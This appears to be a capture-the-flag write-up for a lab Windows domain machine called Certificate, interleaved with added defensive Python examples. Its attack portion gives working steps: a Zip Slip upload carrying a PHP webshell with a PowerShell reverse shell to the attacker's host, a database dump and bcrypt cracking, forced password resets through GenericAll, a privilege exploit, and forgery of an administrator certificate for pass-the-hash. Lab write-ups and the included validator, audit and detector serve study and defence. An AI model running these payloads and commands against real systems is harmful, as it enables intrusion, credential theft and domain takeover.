
Recon
Nmap scan:

echo '10.10.11.71 DC01.certificate.htb certificate.htb' >> /etc/hosts
User flag
Go to the webpage:

Create a student account and enroll in a course. Then click on a random submit button:


You'll get an upload page. It's vulnerable to Zip Slip. Execute the following commands:
touch evil.pdf
mkdir malicious_file && cd malicious_file
nano shell.php
<?php
shell_exec("powershell -nop -w hidden -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',4444); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){; \$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length); \$stream.Flush()}; \$client.Close()\"");
?>
cd ..
zip evil.zip evil.pdf
zip -r malicious_file malicious_file/
cat evil.zip malicious_file.zip > combined.zip
Next, upload combined.zip, click on 'HERE' and replace the end of the URL with 'malicious_file/shell.php':
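From the defender's side, the upload handler should have rejected this archive. The Python validator below is an added example, not code from the box or its web application: it flags the two things the upload above relies on, a second end-of-central-directory record left by concatenating two zips and entry names that escape the extraction directory. The `build_zip` helper and the sample archive contents are constructed for the demonstration so it runs offline.

```python
import io
import posixpath
import zipfile

EOCD_SIG = b"PK\x05\x06"  # end-of-central-directory record signature


def zip_findings(data: bytes) -> list[str]:
    """Return the reasons to reject an uploaded ZIP; an empty list means accept."""
    findings = []

    # 1. A well-formed archive carries exactly one end-of-central-directory
    #    record. Two archives glued together with `cat a.zip b.zip > c.zip`
    #    carry two, and which half a consumer honours depends on its parser,
    #    so the safe answer is to reject. (A byte scan can in rare cases hit
    #    the signature inside compressed data; a production check should walk
    #    the records instead.)
    if data.count(EOCD_SIG) != 1:
        findings.append("concatenated archive: expected exactly one EOCD record")

    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile as exc:
        findings.append(f"not a valid ZIP: {exc}")
        return findings
    infos = zf.infolist()

    # 2. CPython reports header_offset as an absolute file offset, so in a
    #    clean archive the first local file header sits at byte 0. Anything
    #    else means data was prepended to the archive that was actually parsed.
    if infos and min(i.header_offset for i in infos) != 0:
        findings.append("prepended data: first local file header is not at offset 0")

    # 3. Every entry name must stay inside the extraction directory (Zip Slip).
    for info in infos:
        name = info.filename.replace("\\", "/")
        if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
            findings.append(f"absolute path entry: {info.filename}")
            continue
        norm = posixpath.normpath(name)
        if norm == ".." or norm.startswith("../"):
            findings.append(f"path traversal entry: {info.filename}")
    return findings


def build_zip(entries: dict[str, bytes]) -> bytes:
    """Build an in-memory ZIP from {name: content}; used only to construct samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples mirroring the upload shapes discussed above.
CLEAN = build_zip({"evil.pdf": b"%PDF-1.4 harmless placeholder"})
WEBSHELL = build_zip({"malicious_file/shell.php": b"<?php /* placeholder */ ?>"})
CONCATENATED = CLEAN + WEBSHELL  # what `cat evil.zip malicious_file.zip` produces
TRAVERSAL = build_zip({"../../htdocs/shell.php": b"<?php /* placeholder */ ?>"})

if __name__ == "__main__":
    for label, sample in [("clean", CLEAN), ("concatenated", CONCATENATED), ("traversal", TRAVERSAL)]:
        print(label, "->", zip_findings(sample) or "accepted")
```

The check on `header_offset` relies on a CPython detail (it adjusts offsets for prepended data), which is also why Python, like many extractors, would silently honour the second archive; the EOCD count is the portable signal.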


Look at certificate.htb/db.php:

PS C:\xampp\htdocs\certificate.htb> type db.php
<?php
// Database connection using PDO
try {
    $dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
    $db_user = 'certificate_webapp_user'; // Change to your DB username
    $db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password
    $options = [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ];
    $pdo = new PDO($dsn, $db_user, $db_passwd, $options);
} catch (PDOException $e) {
    die('Database connection failed: ' . $e->getMessage());
}
?>
Use the command below to dump the users table:
PS C:\xampp\htdocs\certificate.htb> C:\xampp\mysql\bin\mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -D Certificate_WEBAPP_DB -e "SELECT * FROM users;"
id first_name last_name username email password created_at role is_active
1 Lorra Armessa Lorra.AAA lorra.aaa@certificate.htb $2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG 2024-12-23 12:43:10 teacher 1
6 Sara Laracrof Sara1200 sara1200@gmail.com $2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK 2024-12-23 12:47:11 teacher 1
7 John Wood Johney johny009@mail.com $2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq 2024-12-23 13:18:18 student 1
8 Havok Watterson havokww havokww@hotmail.com $2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti 2024-12-24 09:08:04 teacher 1
9 Steven Roman stev steven@yahoo.com $2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2 2024-12-24 12:05:05 student 1
10 Sara Brawn sara.b sara.b@certificate.htb $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6 2024-12-25 21:31:26 admin 1
12 cyber fish cyber_fish cyber_fish@mail.com $2y$04$/ig4nzh4o60sFvgEvabAweyrQ2uljQomR5D6NrO4ZuScU0587Y3Me 2025-06-02 13:32:58 student 1
13 kash333 kash kash kash@kash.test $2y$04$/fALjZzHJfD2pEYA30d7jOc1UOnSu/B3bm69Pw.trGVTSvSg62JlW 2025-06-02 13:33:26 student 1
14 dwed dw test123 teste@test.com $2y$04$6cBQWbNr4oTPY69eUcfe/uRd6a6SHTJlqRJnU6Bro17jGxw5bn7Ey 2025-06-02 13:33:34 student 1
15 john doe johnd johnd@mail.com $2y$04$Wt0eyWlIZGyBhJS55MxfKOa8QVD7Y7vebf/vbWfs6AQGWNh3ZEsGC 2025-06-02 13:34:10 teacher 0
16 Zak zz No1V4 No1V4@gg.com $2y$04$5ZOtt1d7oYdfpysjw1b3nuqZJdK9UYXz627zPy7TL8ejV3uAwZYsu 2025-06-02 13:34:42 student 1
17 frixzer Frixzerfrixzer frixzer frixzer@frixzer.com $2y$04$VJJE0GPsoIca/fbk0pLu1ehA6r78tvWIwSGjfECttZ6BD3vcQY1M6 2025-06-02 13:36:17 teacher 0
18 Minus 1iq minus1iq minus1iq@mail.com $2y$04$2KlvL0T7TUAcno2e1xBT4ezUyeE9.I75RaDMdylc2Sw96foO18BAK 2025-06-02 13:39:16 student 1
19 pattack P pat admin4@admin.se $2y$04$GvD.yAipwEVuawjLuaDXGuzB7fHZXvjmYC3bax5Dju3ZWWlnfiFq6 2025-06-02 13:42:21 student 1
21 frixzerfrixzer frixzerfrixzer frixzerfrixzer frixzerfrixzer@frixzerfrixzer.com $2y$04$jBXb1EWj4UzRtqO0ui8tqObAXgTzsxxO5XtSphaMtZLQX6KWvo/YK 2025-06-02 13:54:09 student 1
22 teste teste teste teste@local.pt $2y$04$amnknftnyQTpHDkYTu0VM.bU5knymGJ9lVT2VSCOAjvktWGhRD1kS 2025-06-02 13:56:50 teacher 0
23 tiago tiago tiago t@t.com $2y$04$fhQikoqIzoJ4Rp8txMbRW.tExFsx62zGOf74q.O/uwkggXGZX7KF6 2025-06-02 14:29:18 student 1
24 amer k amerk amerk@gmail.com $2y$04$w.SyouqyT0qtw4bhtHuU8untMEciseCdi0oO7xm0MjgIGbIo9a47C 2025-06-02 14:37:23 student 1
25 appa appa appa appa@appa.com $2y$04$2zFzcigZ9DsS27tawBTLkuQA.OVLre.Z8pBgwd.wEQ6OIRfjax2Ia 2025-06-02 14:54:03 student 1
26 123 123 123 test@mail.ru $2y$04$FXtMlv3B3tn4pUms7XPTh.nMoN1QX73KZaKwa796zUxIdwWrQv7m2 2025-06-02 15:05:22 student 1
27 1234 1234 1234 1234@mail.ru $2y$04$OIdCZLXa87F5KeI0SjpccuQTurRcbI3dcNllNzoiHGxNTPQvvgZB6 2025-06-02 15:06:36 teacher 0
28 German Cat niman nicta@blackcat.cat $2y$04$7xg4llP2Ww5Z1O8740M5c.yEzU8p.mQPLMPXYRVkyqhFy0ethXoGe 2025-06-02 15:53:58 student 1
29 Nika Blackcat nicat nika99@blackcat.car $2y$04$l7ASl89CfDkWvcl4gQ6OuuUQzbvQDZIytsgWZzlsFVB0pCXZC1ZOW 2025-06-02 16:03:51 teacher 0
Crack the Sara.B hash:
echo '$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6' > sara_hash
hashcat -m 3200 sara_hash rockyou.txt -O -S -w 3
$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6:Blink182
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8U...kZNdH6
Time.Started.....: Mon Jun 2 17:20:24 2025 (1 sec)
Time.Estimated...: Mon Jun 2 17:20:25 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/lists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 10385 H/s (9.14ms) @ Accel:12 Loops:16 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 12240/14344384 (0.09%)
Rejected.........: 0/12240 (0.00%)
Restore.Point....: 12096/14344384 (0.08%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-16
Candidate.Engine.: Device Generator
Candidates.#1....: iloveu3 -> ulster
Hardware.Mon.#1..: Temp: 65c Util: 89%
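Why the hash fell in one second: every hash in the dump uses cost 4 (`$2y$04$`), the lowest bcrypt allows. The Python script below is an added example, not from the page's author: it parses the cost factor out of the dumped hashes, lists the accounts that need rehashing, and projects how long the same rockyou run would take at higher cost factors from the 10385 H/s hashcat measured above. The minimum acceptable cost of 10 is an assumed policy value.

```python
import re
from typing import Optional

# bcrypt hash: $2a$/$2b$/$2y$, two-digit cost, then 22-char salt + 31-char digest.
BCRYPT_RE = re.compile(r"^\$2[aby]\$(\d{2})\$[./A-Za-z0-9]{53}$")

# Figures read off the hashcat run above.
OBSERVED_RATE_HS = 10385         # Speed.#1 at cost 4
ROCKYOU_CANDIDATES = 14344384    # Progress denominator (lines in rockyou.txt)
MEASURED_COST = 4
MIN_ACCEPTABLE_COST = 10         # assumed policy floor (PHP's password_hash default)


def bcrypt_cost(hash_str: str) -> Optional[int]:
    """Return the cost factor of a bcrypt hash, or None if it is not bcrypt."""
    m = BCRYPT_RE.match(hash_str)
    return int(m.group(1)) if m else None


def seconds_to_exhaust(cost: int) -> float:
    """bcrypt runs 2**cost key-setup rounds, so throughput halves per +1 cost."""
    rate = OBSERVED_RATE_HS / 2 ** (cost - MEASURED_COST)
    return ROCKYOU_CANDIDATES / rate


def audit(rows):
    """rows: iterable of (username, role, hash). Returns the rows needing a rehash."""
    weak = []
    for username, role, h in rows:
        cost = bcrypt_cost(h)
        if cost is None or cost < MIN_ACCEPTABLE_COST:
            weak.append((username, role, cost))
    return weak


# Three rows copied from the users dump above (only the fields needed here).
USERS = [
    ("Lorra.AAA", "teacher", "$2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG"),
    ("sara.b", "admin", "$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6"),
    ("Johney", "student", "$2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq"),
]

if __name__ == "__main__":
    for username, role, cost in audit(USERS):
        print(f"rehash needed: {username} ({role}) cost={cost}")
    for cost in (4, 10, 12):
        print(f"cost {cost:2d}: full rockyou in {seconds_to_exhaust(cost) / 3600:.1f} h")
```

At cost 4 the whole wordlist takes about 23 minutes on this hardware; at cost 12 the same run is 256 times slower, roughly four days, which is the whole point of the work factor.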
Synchronize the time with faketime:
faketime "$(date +'%Y-%m-%d') $(net time -S 10.10.11.71 | awk '{print $4}')" zsh
Use the Sara.B account with BloodHound:
bloodhound-python -u 'Sara.B' -p 'Blink182' -d certificate.htb -c All --zip -ns 10.10.11.71
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: certificate.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.certificate.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: dc01.certificate.htb
INFO: Found 19 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: WS-05.certificate.htb
INFO: Querying computer: WS-01.certificate.htb
INFO: Querying computer: DC01.certificate.htb
INFO: Done in 00M 05S
INFO: Compressing output into 20250602172416_bloodhound.zip
Select Sara.B in the search bar:

Click on Transitive Object Controllers:


Sara.B is a member of Account Operators. Let's look at the High Value Targets:

This group has GenericAll on Lion.SK, so you can change that account's password. To do this, execute the following commands and then log in as Lion.SK to obtain the user flag:
net rpc password "Lion.SK" "newP@ssword2025" -U "certificate.htb"/"Sara.B"%"Blink182" -S certificate.htb
evil-winrm -i 10.10.11.71 -u 'Lion.SK' -p 'newP@ssword2025'
cd ../Desktop; type user.txt
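Each reset done this way (this one, and the Ryan.K reset in the root section below) is recorded on the domain controller as Security event 4724, "An attempt was made to reset an account's password", with the resetting account in SubjectUserName and the victim in TargetUserName. The Python detector below is an added example, not part of this write-up: it runs over constructed JSON-serialised events and alerts when the actor is outside an assumed allow-list of reset-authorised accounts or the target is an assumed privileged account. The account names in both lists and the sample events are assumptions modelled on this box.

```python
import json

# Accounts authorised to reset passwords (helpdesk/admin); assumed policy.
AUTHORISED_RESETTERS = {"helpdesk.svc", "administrator"}
# Accounts whose reset should always be reviewed; assumed, modelled on this box.
PRIVILEGED_TARGETS = {"lion.sk", "ryan.k", "administrator"}


def parse_event(line: str):
    """Return (time, actor, target) for a 4724 event, or None for anything else."""
    ev = json.loads(line)
    if ev.get("EventID") != 4724:
        return None
    return (ev["TimeCreated"], ev["SubjectUserName"].lower(), ev["TargetUserName"].lower())


def detect_resets(lines):
    """Return a list of alerts as (time, actor, target, reasons)."""
    alerts = []
    for line in lines:
        parsed = parse_event(line)
        if parsed is None:
            continue
        time, actor, target = parsed
        reasons = []
        if actor not in AUTHORISED_RESETTERS:
            reasons.append("actor not authorised to reset passwords")
        if target in PRIVILEGED_TARGETS:
            reasons.append("privileged target account")
        if reasons:
            alerts.append((time, actor, target, reasons))
    return alerts


# Constructed sample events (one JSON object per line): the two resets in this
# write-up, an unrelated logon (4624), and a benign helpdesk reset of a student.
SAMPLE_LOG = [
    '{"EventID": 4724, "TimeCreated": "2025-06-02T17:31:05Z", "SubjectUserName": "Sara.B", '
    '"SubjectDomainName": "CERTIFICATE", "TargetUserName": "Lion.SK", "TargetDomainName": "CERTIFICATE"}',
    '{"EventID": 4624, "TimeCreated": "2025-06-02T17:31:40Z", "SubjectUserName": "-", "TargetUserName": "Lion.SK"}',
    '{"EventID": 4724, "TimeCreated": "2025-06-02T17:40:12Z", "SubjectUserName": "Sara.B", '
    '"SubjectDomainName": "CERTIFICATE", "TargetUserName": "Ryan.K", "TargetDomainName": "CERTIFICATE"}',
    '{"EventID": 4724, "TimeCreated": "2025-06-02T18:02:00Z", "SubjectUserName": "helpdesk.svc", '
    '"SubjectDomainName": "CERTIFICATE", "TargetUserName": "Johney", "TargetDomainName": "CERTIFICATE"}',
]

if __name__ == "__main__":
    for time, actor, target, reasons in detect_resets(SAMPLE_LOG):
        print(f"{time} {actor} -> {target}: {'; '.join(reasons)}")
```

The same rule fires twice here, once per reset, and stays silent for the helpdesk reset of a student; the underlying fix is to review Account Operators membership, since that group is what gives Sara.B the GenericAll edge in the first place.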

Root flag
Change Ryan.K's password the same way as Lion.SK's:
net rpc password "Ryan.K" "newP@ssword2025" -U "certificate.htb"/"Sara.B"%"Blink182" -S certificate.htb
evil-winrm -i 10.10.11.71 -u 'Ryan.K' -p 'newP@ssword2025'
whoami /priv

As you can see, SeManageVolumePrivilege is enabled. You can abuse it with this: https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe. With this exploit, Ryan.K gains full access to C:\
Upload it to the target and execute it:

Now, use certutil to export the CA's PFX file:
certutil -exportPFX my "Certificate-LTD-CA" C:\Users\Public\ca.pfx

cd C:\Users\Public
download ca.pfx

With this ca.pfx file we can forge administrator.pfx. Back on your machine, run this command:
certipy forge -ca-pfx ca.pfx -upn administrator@certificate.htb -subject "CN=Administrator,CN=Users,DC=certificate,DC=htb" -out administrator_forged.pfx
Then use Certipy again to obtain the administrator hash:
certipy auth -pfx administrator_forged.pfx -dc-ip 10.10.11.71
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@certificate.htb'
[*] Using principal: 'administrator@certificate.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
File 'administrator.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certificate.htb': aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6

evil-winrm -i 10.10.11.71 -u 'administrator' -H 'd804304519bf0143c14cbf1c024408c6'
type ../Desktop/root.txt

Cyberfishement 🐡